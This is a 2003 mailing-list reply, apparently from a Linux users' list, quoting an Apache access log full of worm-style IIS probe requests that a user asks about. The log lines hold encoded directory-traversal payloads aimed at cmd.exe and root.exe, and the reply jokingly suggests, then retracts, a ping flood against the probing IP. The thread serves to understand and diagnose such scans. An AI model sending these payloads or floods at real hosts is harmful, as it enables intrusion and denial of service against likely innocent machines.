sometimes this isnt automated, but people that type in the IP without scan first, if you are on a heavy connection, and aint scared that your ISP is gonna shut you down, try with ping -f 65.27.204.81 :-) just kidding, dont do it, it probably aint the true owners of the ip that does it, they are probably victims themselves :-)
On Wed, 2003-12-31 at 11:18, Aaron Walker wrote: > A week or so ago, I setup my cable router/firewall to forward port 80 to > one of my machines so I could run Apache. Last night while at work, I > checked to see if it worked, and it did. So just now, I went to check > out the access_log and noticed some funny looking stuff, that doesnt > look like normal activity.... > > <snipped from /var/log/apache2/access_log> > > 218.145.25.11 - - [28/Dec/2003:19:40:17 -0500] "GET > /scripts/nsiislog.dll HTTP/1.0" 404 286 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:40 -0500] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 321 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 321 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir > > HTTP/1.0" 404 337 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 > "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" > 221.13.152.198 - - [30/Dec/2003:04:58:50 -0500] "get > /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir" > > 501 336 "-" "-" > > is this someone trying to exploit apache? > > Thanks, > Aaron -- Regards, Redeeman () ascii ribbon campaign - against html e-mail /\ - against microsoft attachments -- [EMAIL PROTECTED] mailing list
